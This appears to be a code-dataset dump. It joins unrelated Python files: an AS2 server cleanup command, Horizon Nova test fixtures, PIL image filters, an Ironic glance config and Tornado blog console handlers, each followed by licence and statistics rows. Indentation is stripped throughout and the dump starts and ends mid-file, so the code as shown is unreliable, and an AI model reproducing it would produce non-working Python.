# in nova will be replaced by neutron's.
for k, v in itertools.chain(
COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items(),
NETWORK_QUOTAS.items()):
if not k == v and info.get(k):
info[v] = info[k]
info.pop(k)
# Handle project ID special as it only appears in output
if 'id' in info:
info['project'] = info.pop('id')
return zip(*sorted(six.iteritems(info)))
| mit | -5,707,946,925,653,465,000 | 33.169565 | 77 | 0.56254 | false | 4.236658 | false | false | false |
marcosxddh/aula_script | backend/appengine/routes/books/rest.py | 1 | 1044 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaebusiness.business import CommandExecutionException
from tekton.gae.middleware.json_middleware import JsonResponse
from book_app import facade
def index():
cmd = facade.list_books_cmd()
book_list = cmd()
short_form=facade.book_short_form()
book_short = [short_form.fill_with_model(m) for m in book_list]
return JsonResponse(book_short)
def save(**book_properties):
cmd = facade.save_book_cmd(**book_properties)
return _save_or_update_json_response(cmd)
def update(book_id, **book_properties):
cmd = facade.update_book_cmd(book_id, **book_properties)
return _save_or_update_json_response(cmd)
def delete(book_id):
facade.delete_book_cmd(book_id)()
def _save_or_update_json_response(cmd):
try:
book = cmd()
except CommandExecutionException:
return JsonResponse({'errors': cmd.errors})
short_form=facade.book_short_form()
return JsonResponse(short_form.fill_with_model(book))
| mit | 2,769,724,432,939,574,300 | 27.216216 | 67 | 0.704981 | false | 3.356913 | false | false | false |
abhishek-ram/pyas2 | pyas2/management/commands/cleanas2server.py | 1 | 3094 | from django.core.management.base import BaseCommand
from django.utils.translation import ugettext as _
from datetime import timedelta
from django.utils import timezone
from pyas2 import models
from pyas2 import pyas2init
import os
import glob
class Command(BaseCommand):
help = _(u'Automatic maintenance for the AS2 server. '
u'Cleans up all the old logs, messages and archived files.')
def handle(self, *args, **options):
pyas2init.logger.info(_(u'Automatic maintenance process started'))
max_archive_dt = timezone.now() - timedelta(
pyas2init.gsettings['max_arch_days'])
max_archive_ts = int(max_archive_dt.strftime("%s"))
pyas2init.logger.info(
_(u'Delete all DB Objects older than max archive days'))
old_message = models.Message.objects.filter(
timestamp__lt=max_archive_dt).order_by('timestamp')
for message in old_message:
pyas2init.logger.debug(
_(u'Delete Message {} and all related '
u'objects'.format(message)))
if message.payload:
message.payload.delete()
if message.mdn:
message.mdn.delete()
message.delete()
pyas2init.logger.info(
_(u'Delete all logs older than max archive days'))
log_folder = os.path.join(pyas2init.gsettings['log_dir'], 'pyas2*')
for logfile in glob.iglob(log_folder):
filename = os.path.join(
pyas2init.gsettings['log_dir'], logfile)
if os.path.getmtime(filename) < max_archive_ts:
pyas2init.logger.debug(
_(u'Delete Log file {}'.format(filename)))
os.remove(filename)
pyas2init.logger.info(
_(u'Delete all Archive Files older than max archive days'))
archive_folders = [
pyas2init.gsettings['payload_send_store'],
pyas2init.gsettings['payload_receive_store'],
pyas2init.gsettings['mdn_send_store'],
pyas2init.gsettings['mdn_receive_store']
]
for archive_folder in archive_folders:
for (dir_path, dir_names, arch_files) in os.walk(archive_folder):
if len(arch_files) > 0:
for arch_file in arch_files:
filename = os.path.join(dir_path, arch_file)
if os.path.getmtime(filename) < max_archive_ts:
pyas2init.logger.debug(_(u'Delete Archive file '
u'{}'.format(filename)))
os.remove(filename)
# Delete the folder if it is empty
try:
os.rmdir(dir_path)
pyas2init.logger.debug(_(u'Delete Empty Archive folder'
u' {}'.format(dir_path)))
except OSError:
pass
pyas2init.logger.info(_(u'Automatic maintenance process completed'))
| gpl-2.0 | 1,272,911,551,532,576,500 | 42.577465 | 79 | 0.555268 | false | 4.273481 | false | false | false |
tuskar/tuskar-ui | openstack_dashboard/test/test_data/nova_data.py | 1 | 22432 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
from novaclient.v1_1 import aggregates
from novaclient.v1_1 import availability_zones
from novaclient.v1_1 import certs
from novaclient.v1_1 import flavors
from novaclient.v1_1 import floating_ips
from novaclient.v1_1 import hypervisors
from novaclient.v1_1 import keypairs
from novaclient.v1_1 import quotas
from novaclient.v1_1 import security_group_rules as rules
from novaclient.v1_1 import security_groups as sec_groups
from novaclient.v1_1 import servers
from novaclient.v1_1 import services
from novaclient.v1_1 import usage
from novaclient.v1_1 import volume_snapshots as vol_snaps
from novaclient.v1_1 import volume_types
from novaclient.v1_1 import volumes
from openstack_dashboard.api.base import Quota
from openstack_dashboard.api.base import QuotaSet as QuotaSetWrapper
from openstack_dashboard.api.nova import FloatingIp as NetFloatingIp
from openstack_dashboard.usage.quotas import QuotaUsage
from openstack_dashboard.test.test_data.utils import TestDataContainer
SERVER_DATA = """
{
"server": {
"OS-EXT-SRV-ATTR:instance_name": "instance-00000005",
"OS-EXT-SRV-ATTR:host": "instance-host",
"OS-EXT-STS:task_state": null,
"addresses": {
"private": [
{
"version": 4,
"addr": "10.0.0.1"
}
]
},
"links": [
{
"href": "%(host)s/v1.1/%(tenant_id)s/servers/%(server_id)s",
"rel": "self"
},
{
"href": "%(host)s/%(tenant_id)s/servers/%(server_id)s",
"rel": "bookmark"
}
],
"image": {
"id": "%(image_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/images/%(image_id)s",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:vm_state": "active",
"flavor": {
"id": "%(flavor_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/flavors/%(flavor_id)s",
"rel": "bookmark"
}
]
},
"id": "%(server_id)s",
"user_id": "%(user_id)s",
"OS-DCF:diskConfig": "MANUAL",
"accessIPv4": "",
"accessIPv6": "",
"progress": null,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"status": "%(status)s",
"updated": "2012-02-28T19:51:27Z",
"hostId": "c461ea283faa0ab5d777073c93b126c68139e4e45934d4fc37e403c2",
"key_name": "%(key_name)s",
"name": "%(name)s",
"created": "2012-02-28T19:51:17Z",
"tenant_id": "%(tenant_id)s",
"metadata": {"someMetaLabel": "someMetaData",
"some<b>html</b>label": "<!--",
"empty": ""}
}
}
"""
USAGE_DATA = """
{
"total_memory_mb_usage": 64246.89777777778,
"total_vcpus_usage": 125.48222222222223,
"total_hours": 125.48222222222223,
"total_local_gb_usage": 0,
"tenant_id": "%(tenant_id)s",
"stop": "2012-01-31 23:59:59",
"start": "2012-01-01 00:00:00",
"server_usages": [
{
"memory_mb": %(flavor_ram)s,
"uptime": 442321,
"started_at": "2012-01-26 20:38:21",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 122.87361111111112,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
},
{
"memory_mb": %(flavor_ram)s,
"uptime": 9367,
"started_at": "2012-01-31 20:54:15",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 2.608611111111111,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
}
]
}
"""
def data(TEST):
TEST.servers = TestDataContainer()
TEST.flavors = TestDataContainer()
TEST.keypairs = TestDataContainer()
TEST.security_groups = TestDataContainer()
TEST.security_groups_uuid = TestDataContainer()
TEST.security_group_rules = TestDataContainer()
TEST.security_group_rules_uuid = TestDataContainer()
TEST.volumes = TestDataContainer()
TEST.quotas = TestDataContainer()
TEST.quota_usages = TestDataContainer()
TEST.floating_ips = TestDataContainer()
TEST.floating_ips_uuid = TestDataContainer()
TEST.usages = TestDataContainer()
TEST.certs = TestDataContainer()
TEST.volume_snapshots = TestDataContainer()
TEST.volume_types = TestDataContainer()
TEST.availability_zones = TestDataContainer()
TEST.hypervisors = TestDataContainer()
TEST.services = TestDataContainer()
TEST.aggregates = TestDataContainer()
# Data return by novaclient.
# It is used if API layer does data conversion.
TEST.api_floating_ips = TestDataContainer()
TEST.api_floating_ips_uuid = TestDataContainer()
# Volumes
volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="41023e92-8008-4c8b-8059-7f2293ff3775",
name='test_volume',
status='available',
size=40,
display_name='Volume name',
created_at='2012-04-01 10:30:00',
volume_type=None,
attachments=[]))
nameless_volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="3b189ac8-9166-ac7f-90c9-16c8bf9e01ac",
name='',
status='in-use',
size=10,
display_name='',
display_description='',
device="/dev/hda",
created_at='2010-11-21 18:34:25',
volume_type='vol_type_1',
attachments=[{"id": "1", "server_id": '1',
"device": "/dev/hda"}]))
attached_volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="8cba67c1-2741-6c79-5ab6-9c2bf8c96ab0",
name='my_volume',
status='in-use',
size=30,
display_name='My Volume',
display_description='',
device="/dev/hdk",
created_at='2011-05-01 11:54:33',
volume_type='vol_type_2',
attachments=[{"id": "2", "server_id": '1',
"device": "/dev/hdk"}]))
TEST.volumes.add(volume)
TEST.volumes.add(nameless_volume)
TEST.volumes.add(attached_volume)
vol_type1 = volume_types.VolumeType(volume_types.VolumeTypeManager(None),
{'id': 1,
'name': 'vol_type_1'})
vol_type2 = volume_types.VolumeType(volume_types.VolumeTypeManager(None),
{'id': 2,
'name': 'vol_type_2'})
TEST.volume_types.add(vol_type1, vol_type2)
# Flavors
flavor_1 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
'name': 'm1.tiny',
'vcpus': 1,
'disk': 0,
'ram': 512,
'swap': 0,
'extra_specs': {},
'OS-FLV-EXT-DATA:ephemeral': 0})
flavor_2 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb",
'name': 'm1.massive',
'vcpus': 1000,
'disk': 1024,
'ram': 10000,
'swap': 0,
'extra_specs': {'Trusted': True, 'foo': 'bar'},
'OS-FLV-EXT-DATA:ephemeral': 2048})
TEST.flavors.add(flavor_1, flavor_2)
# Keypairs
keypair = keypairs.Keypair(keypairs.KeypairManager(None),
dict(name='keyName'))
TEST.keypairs.add(keypair)
# Security Groups and Rules
def generate_security_groups(is_uuid=False):
def get_id(is_uuid):
global current_int_id
if is_uuid:
return str(uuid.uuid4())
else:
get_id.current_int_id += 1
return get_id.current_int_id
get_id.current_int_id = 0
sg_manager = sec_groups.SecurityGroupManager(None)
rule_manager = rules.SecurityGroupRuleManager(None)
sec_group_1 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"default",
"description": u"default"})
sec_group_2 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"other_group",
"description": u"NotDefault."})
sec_group_3 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"another_group",
"description": u"NotDefault."})
rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
icmp_rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"icmp",
'from_port': u"9",
'to_port': u"5",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
group_rule = {'id': 3,
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'source_group_id': sec_group_1.id}
rule_obj = rules.SecurityGroupRule(rule_manager, rule)
rule_obj2 = rules.SecurityGroupRule(rule_manager, icmp_rule)
rule_obj3 = rules.SecurityGroupRule(rule_manager, group_rule)
sec_group_1.rules = [rule_obj]
sec_group_2.rules = [rule_obj]
return {"rules": [rule_obj, rule_obj2, rule_obj3],
"groups": [sec_group_1, sec_group_2, sec_group_3]}
sg_data = generate_security_groups()
TEST.security_group_rules.add(*sg_data["rules"])
TEST.security_groups.add(*sg_data["groups"])
sg_uuid_data = generate_security_groups(is_uuid=True)
TEST.security_group_rules_uuid.add(*sg_uuid_data["rules"])
TEST.security_groups_uuid.add(*sg_uuid_data["groups"])
# Quota Sets
quota_data = dict(metadata_items='1',
injected_file_content_bytes='1',
volumes='1',
gigabytes='1000',
ram=10000,
floating_ips='1',
fixed_ips='10',
instances='10',
injected_files='1',
cores='10',
security_groups='10',
security_group_rules='20')
quota = quotas.QuotaSet(quotas.QuotaSetManager(None), quota_data)
TEST.quotas.nova = QuotaSetWrapper(quota)
TEST.quotas.add(QuotaSetWrapper(quota))
# Quota Usages
quota_usage_data = {'gigabytes': {'used': 0,
'quota': 1000},
'instances': {'used': 0,
'quota': 10},
'ram': {'used': 0,
'quota': 10000},
'cores': {'used': 0,
'quota': 20}}
quota_usage = QuotaUsage()
for k, v in quota_usage_data.items():
quota_usage.add_quota(Quota(k, v['quota']))
quota_usage.tally(k, v['used'])
TEST.quota_usages.add(quota_usage)
# Limits
limits = {"absolute": {"maxImageMeta": 128,
"maxPersonality": 5,
"maxPersonalitySize": 10240,
"maxSecurityGroupRules": 20,
"maxSecurityGroups": 10,
"maxServerMeta": 128,
"maxTotalCores": 20,
"maxTotalFloatingIps": 10,
"maxTotalInstances": 10,
"maxTotalKeypairs": 100,
"maxTotalRAMSize": 10000,
"totalCoresUsed": 0,
"totalInstancesUsed": 0,
"totalKeyPairsUsed": 0,
"totalRAMUsed": 0,
"totalSecurityGroupsUsed": 0}}
TEST.limits = limits
# Servers
tenant3 = TEST.tenants.list()[2]
vals = {"host": "http://nova.example.com:8774",
"name": "server_1",
"status": "ACTIVE",
"tenant_id": TEST.tenants.first().id,
"user_id": TEST.user.id,
"server_id": "1",
"flavor_id": flavor_1.id,
"image_id": TEST.images.first().id,
"key_name": keypair.name}
server_1 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": "server_2",
"status": "BUILD",
"server_id": "2"})
server_2 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": u'\u4e91\u89c4\u5219',
"status": "ACTIVE",
"tenant_id": tenant3.id,
"server_id": "3"})
server_3 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
TEST.servers.add(server_1, server_2, server_3)
# VNC Console Data
console = {u'console': {u'url': u'http://example.com:6080/vnc_auto.html',
u'type': u'novnc'}}
TEST.servers.vnc_console_data = console
# SPICE Console Data
console = {u'console': {u'url': u'http://example.com:6080/spice_auto.html',
u'type': u'spice'}}
TEST.servers.spice_console_data = console
# Floating IPs
def generate_fip(conf):
return floating_ips.FloatingIP(floating_ips.FloatingIPManager(None),
conf)
fip_1 = {'id': 1,
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_2 = {'id': 2,
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips.add(generate_fip(fip_1), generate_fip(fip_2))
TEST.floating_ips.add(NetFloatingIp(generate_fip(fip_1)),
NetFloatingIp(generate_fip(fip_2)))
# Floating IP with UUID id (for Floating IP with Neutron Proxy)
fip_3 = {'id': str(uuid.uuid4()),
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_4 = {'id': str(uuid.uuid4()),
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips_uuid.add(generate_fip(fip_3), generate_fip(fip_4))
TEST.floating_ips_uuid.add(NetFloatingIp(generate_fip(fip_3)),
NetFloatingIp(generate_fip(fip_4)))
# Usage
usage_vals = {"tenant_id": TEST.tenant.id,
"instance_name": server_1.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_vals))
TEST.usages.add(usage_obj)
usage_2_vals = {"tenant_id": tenant3.id,
"instance_name": server_3.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj_2 = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_2_vals))
TEST.usages.add(usage_obj_2)
volume_snapshot = vol_snaps.Snapshot(vol_snaps.SnapshotManager(None),
{'id': '40f3fabf-3613-4f5e-90e5-6c9a08333fc3',
'display_name': 'test snapshot',
'display_description': 'vol snap!',
'size': 40,
'status': 'available',
'volume_id': '41023e92-8008-4c8b-8059-7f2293ff3775'})
TEST.volume_snapshots.add(volume_snapshot)
cert_data = {'private_key': 'private',
'data': 'certificate_data'}
certificate = certs.Certificate(certs.CertificateManager(None), cert_data)
TEST.certs.add(certificate)
# Availability Zones
TEST.availability_zones.add(
availability_zones.AvailabilityZone(
availability_zones.AvailabilityZoneManager(None),
{'zoneName': 'nova', 'zoneState': {'available': True}}
)
)
# hypervisors
hypervisor_1 = hypervisors.Hypervisor(hypervisors.HypervisorManager(None),
{
"service": {"host": "devstack001", "id": 3},
"vcpus_used": 1,
"hypervisor_type": "QEMU",
"local_gb_used": 20,
"hypervisor_hostname": "devstack001",
"memory_mb_used": 1500,
"memory_mb": 2000,
"current_workload": 0,
"vcpus": 1,
"cpu_info": '{"vendor": "Intel", "model": "core2duo",'
'"arch": "x86_64", "features": ["lahf_lm"'
', "rdtscp"], "topology": {"cores": 1, "t'
'hreads": 1, "sockets": 1}}',
"running_vms": 1,
"free_disk_gb": 9,
"hypervisor_version": 1002000,
"disk_available_least": 6,
"local_gb": 29,
"free_ram_mb": 500,
"id": 1
}
)
TEST.hypervisors.add(hypervisor_1)
# Services
service_1 = services.Service(services.ServiceManager(None),
{
"status": "enabled",
"binary": "nova-conductor",
"zone": "internal",
"state": "up",
"updated_at": "2013-07-08T05:21:00.000000",
"host": "devstack001",
"disabled_reason": None
}
)
service_2 = services.Service(services.ServiceManager(None),
{
"status": "enabled",
"binary": "nova-compute",
"zone": "nova",
"state": "up",
"updated_at": "2013-07-08T05:20:51.000000",
"host": "devstack001",
"disabled_reason": None
}
)
TEST.services.add(service_1)
TEST.services.add(service_2)
# Aggregates
aggregate_1 = aggregates.Aggregate(aggregates.AggregateManager(None),
{
"name": "foo",
"availability_zone": None,
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 1,
"metadata": {
"foo": "testing",
"bar": "testing"
}
}
)
aggregate_2 = aggregates.Aggregate(aggregates.AggregateManager(None),
{
"name": "bar",
"availability_zone": "testing",
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 2,
"metadata": {
"foo": "testing",
"bar": "testing"
}
}
)
TEST.aggregates.add(aggregate_1)
TEST.aggregates.add(aggregate_2)
| apache-2.0 | 3,151,234,665,979,034,000 | 37.476844 | 79 | 0.471113 | false | 3.967457 | true | false | false |
andela-ggikera/photo-editing-app | editor/photo_effects.py | 1 | 3217 | """Define imports."""
from PIL import ImageFilter, ImageOps, ImageEnhance
def grayscale(image, name, temp_url):
"""Return an image with a contrast of grey."""
image.seek(0)
photo = ImageOps.grayscale(image)
photo.save(temp_url + "GRAYSCALE" + name)
return temp_url + "GRAYSCALE" + name
def smooth(image, name, temp_url):
"""Return a smoothened image."""
image.seek(0)
photo = image.filter(ImageFilter.SMOOTH)
photo.save(temp_url + "SMOOTH" + name)
return temp_url + "SMOOTH" + name
def contour(image, name, temp_url):
"""Return an image with a contour filter."""
image.seek(0)
photo = image.filter(ImageFilter.CONTOUR)
photo.save(temp_url + "CONTOUR" + name)
return temp_url + "CONTOUR" + name
def sharpen(image, name, temp_url):
"""Return a sharpened image."""
image.seek(0)
photo = image.filter(ImageFilter.SHARPEN)
photo.save(temp_url + "SHARPEN" + name)
return temp_url + "SHARPEN" + name
def detail(image, name, temp_url):
"""Return an image with edge enhancement."""
image.seek(0)
photo = image.filter(ImageFilter.EDGE_ENHANCE)
photo.save(temp_url + "DETAIL" + name)
return temp_url + "DETAIL" + name
def flip(image, name, temp_url):
"""Flip an image."""
image.seek(0)
photo = ImageOps.flip(image)
photo.save(temp_url + "FLIP" + name)
return temp_url + "FLIP" + name
def invert(image, name, temp_url):
"""Invert an image."""
image.seek(0)
photo = ImageOps.invert(image)
photo.save(temp_url + "INVERT" + name)
return temp_url + "INVERT" + name
def mirror(image, name, temp_url):
"""Flip the image horizontally."""
image.seek(0)
photo = ImageOps.mirror(image)
photo.save(temp_url + "MIRROR" + name)
return temp_url + "MIRROR" + name
def contrast(image, name, temp_url):
"""Increase the contrast of an image and return the enhanced image."""
image.seek(0)
photo = ImageEnhance.Contrast(image)
photo = photo.enhance(1.5)
photo.save(temp_url + "CONTRAST" + name)
return temp_url + "CONTRAST" + name
def blur(image, name, temp_url):
"""Return a blur image using a gaussian blur filter."""
image.seek(0)
photo = image.filter(
ImageFilter.GaussianBlur(radius=3))
photo.save(temp_url + "BLUR" + name)
return temp_url + "BLUR" + name
def brighten(image, name, temp_url):
"""Return an image with a brightness enhancement factor of 1.5."""
image.seek(0)
photo = ImageEnhance.Brightness(image)
photo = photo.enhance(1.5)
photo.save(temp_url + "BRIGHTEN" + name)
return temp_url + "BRIGHTEN" + name
def darken(image, name, temp_url):
"""Return an image with a brightness enhancement factor of 0.5."""
image.seek(0)
photo = ImageEnhance.Brightness(image)
photo = photo.enhance(0.5)
photo.save(temp_url + "SATURATE" + name)
return temp_url + "SATURATE" + name
def saturate(image, name, temp_url):
"""Return an image with a saturation enhancement factor of 2.0 ."""
image.seek(0)
photo = ImageEnhance.Color(image)
photo = photo.enhance(2.0)
photo.save(temp_url + "SATURATE" + name)
return temp_url + "SATURATE" + name
| mit | 837,746,076,482,372,200 | 27.981982 | 74 | 0.646254 | false | 3.081418 | false | false | false |
ramineni/myironic | ironic/common/image_service.py | 1 | 2467 | # Copyright 2010 OpenStack Foundation
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.utils import importutils
from oslo_config import cfg
glance_opts = [
cfg.StrOpt('glance_host',
default='$my_ip',
help='Default glance hostname or IP address.'),
cfg.IntOpt('glance_port',
default=9292,
help='Default glance port.'),
cfg.StrOpt('glance_protocol',
default='http',
help='Default protocol to use when connecting to glance. '
'Set to https for SSL.'),
cfg.ListOpt('glance_api_servers',
help='A list of the glance api servers available to ironic. '
'Prefix with https:// for SSL-based glance API servers. '
'Format is [hostname|IP]:port.'),
cfg.BoolOpt('glance_api_insecure',
default=False,
help='Allow to perform insecure SSL (https) requests to '
'glance.'),
cfg.IntOpt('glance_num_retries',
default=0,
help='Number of retries when downloading an image from '
'glance.'),
cfg.StrOpt('auth_strategy',
default='keystone',
help='Default protocol to use when connecting to glance. '
'Set to https for SSL.'),
]
CONF = cfg.CONF
CONF.register_opts(glance_opts, group='glance')
def import_versioned_module(version, submodule=None):
module = 'ironic.common.glance_service.v%s' % version
if submodule:
module = '.'.join((module, submodule))
return importutils.try_import(module)
def Service(client=None, version=1, context=None):
module = import_versioned_module(version, 'image_service')
service_class = getattr(module, 'GlanceImageService')
return service_class(client, version, context)
| apache-2.0 | -1,234,819,432,871,128,000 | 36.378788 | 78 | 0.633158 | false | 4.32049 | false | false | false |
nuanri/hiblog | src/app/blog/console_views.py | 1 | 17946 | # coding: utf-8
import json
import requests
from hanlder import RequestHandler as BaseRequestHandler
import tornado.web
from tornado.web import authenticated
from ..utils import deal_errors, get_local_time, get_local_time_string
from .forms import BlogWriterForm, BlogCatalogWriterForm
class RequestHandler(BaseRequestHandler):
def q(self, query_string, query_variables=None,headers=None, api_url=None):
if not (headers and isinstance(headers, dict)):
headers = {}
if query_variables is None:
query_variables = {}
sid = self.get_secure_cookie('SID')
if api_url:
url = "http://127.0.0.1:3000" + api_url
else:
url = "http://127.0.0.1:3000/console/graphql"
if sid:
if 'Authorization' not in headers:
headers['Authorization'] = 'OOC ' + sid.decode()
s = requests.Session()
r = s.post(url, json={"query": query_string, "variables": query_variables}, headers=headers)
return r.json()
class ApiHandler(RequestHandler):
def post(self, URL):
body = self.request.body.decode()
body = json.loads(body)
# query_string = self.get_argument('query', "")
query_string = body["query"]
variables = body.get("variables", None)
# print("variables==>",variables)
r = self.q(query_string, variables, api_url=URL)
self.write(r)
# console 文章部分开始
class ConsoleBlogdexHandler(RequestHandler):
BLOG_LIST_QUERY = '''
query Blogs(
$first: Int
$sort_by: String
$sort_direction: String
){
blog{id,...F1}
}
fragment F1 on BlogApi{
articles(
first: $first,
sort_by: $sort_by,
sort_direction: $sort_direction
) {
edges {
node {
id
title
body
body_markup
updated
uid
is_public
catalog {
name
}
}
}
pageInfo {
hasPreviousPage
startCursor
endCursor
hasNextPage
}
}
}'''
@authenticated
def get(self):
# print("current_user=",self.current_user.username)
bloglist_query_variables = {
"first": 12,
"sort_by": "updated",
"sort_direction": "desc",
}
bloglist_query_variables = json.dumps(bloglist_query_variables)
r = self.q(self.BLOG_LIST_QUERY, bloglist_query_variables)
# print("index==>roooo",r)
blog_list = r.get("data").get("blog").get("articles").get("edges")
self.render('/blog/console/blog_articles.html', blog_list=blog_list, get_local_time=get_local_time )
class BlogWriterHandler(RequestHandler):
BLOG_WRITER_QUERY='''
mutation BlogArticleNew(
$input_0: BlogArticleNewInput!
) {
blog_article_new(input: $input_0) {
article {
id
title
abstract
body
body_markup
is_public
uid
catalog{
uid
}
}
}
}'''
BLOG_CATALOG_LIST_QUERY = '''
query BlogCatalogs{
blog{id,...F1}
}
fragment F1 on BlogApi{
catalogs {
name
summary
body_html
created
updated
uid
public_article_count
private_article_count
}
}'''
def get_catalogs(self):
r = self.q(self.BLOG_CATALOG_LIST_QUERY)
catalog_list = r.get("data").get("blog").get("catalogs")
return catalog_list
@authenticated
def get(self):
form = BlogWriterForm(self)
catalog_list = self.get_catalogs()
self.render("blog/console/blog_writer.html", form=form, catalog_list=catalog_list)
@authenticated
def post(self):
form = BlogWriterForm(self)
catalog_list = self.get_catalogs()
if not form.validate():
error = form.errors
tag_list = []
tag_uid = form.tags.data.split(",")[::2]
tag_name = form.tags.data.split(",")[1::2]
for u,n in zip(tag_uid, tag_name):
tag_list.append((u,n))
return self.render("blog/console/blog_writer.html", form=form,
catalog_list=catalog_list, error=error,tag_list=tag_list)
blogwriter_query_variables = {
"input_0":
{
"title": "",
"clientMutationId": "1",
"abstract": "",
"body": "",
"is_public": False,
"catalog_uid": "",
"tags": "",
}
}
blogwriter_query_variables["input_0"]["is_public"] = form.is_public.data
blogwriter_query_variables["input_0"]["title"] = form.title.data
blogwriter_query_variables["input_0"]["abstract"] = form.abstract.data
blogwriter_query_variables["input_0"]["body"] = form.body.data
blogwriter_query_variables["input_0"]["catalog_uid"] = form.catalog_uid.data
blogwriter_query_variables["input_0"]["tags"] = form.tags.data.split(",")[::2]
# print("form.tags.data==>",form.tags.data)
blogwriter_query_variables = json.dumps(blogwriter_query_variables)
r = self.q(self.BLOG_WRITER_QUERY, blogwriter_query_variables)
if r.get("errors"):
errors = r.get("errors")
error = deal_errors(errors)
tag_list = []
tag_uid = form.tags.data.split(",")[::2]
tag_name = form.tags.data.split(",")[1::2]
for u,n in zip(tag_uid, tag_name):
tag_list.append((u,n))
self.render("blog/console/blog_writer.html", form=form,
catalog_list=catalog_list, error=error, tag_list=tag_list)
UID = r.get("data").get("blog_article_new").get("article")["uid"]
self.redirect("/console/blog/article/" + UID)
class BlogShowHandler(RequestHandler):
BLOG_SHOW_QUERY = '''
query Blog(
$uid: String!
){
blog{id,...F1}
}
fragment F1 on BlogApi{
article: article_u (
uid: $uid
) {
title
body: body_html
is_public
uid
catalog {
name
}
tags {
uid
name
}
}
}
'''
@authenticated
def get(self, UID):
blogshow_query_variables = {
"uid": UID,
}
blogshow_query_variables = json.dumps(blogshow_query_variables)
r = self.q(self.BLOG_SHOW_QUERY, blogshow_query_variables)
# print('r--->',r)
blog = r.get("data").get("blog").get("article")
self.render('blog/console/blog_show.html', blog=blog)
class BlogEditHandler(RequestHandler):
BLOG_EDIT_QUERY = '''
mutation MyMutation(
$input: BlogArticleEditInput!
) {
blog_article_edit(input: $input) {
article {
id
title
}
}
}'''
BLOG_SHOW_QUERY = '''
query Blog(
$uid: String!
){
blog{id,...F1}
}
fragment F1 on BlogApi{
article: article_u (
uid: $uid
) {
title
body
abstract
is_public
catalog {
name
uid
}
tags {
uid
name
}
}
}'''
BLOG_CATALOG_LIST_QUERY = '''
query BlogCatalogs{
blog{id,...F1}
}
fragment F1 on BlogApi{
catalogs {
name
summary
body_html
created
updated
uid
public_article_count
private_article_count
}
}'''
def get_catalogs(self):
r = self.q(self.BLOG_CATALOG_LIST_QUERY)
catalog_list = r.get("data").get("blog").get("catalogs")
return catalog_list
@authenticated
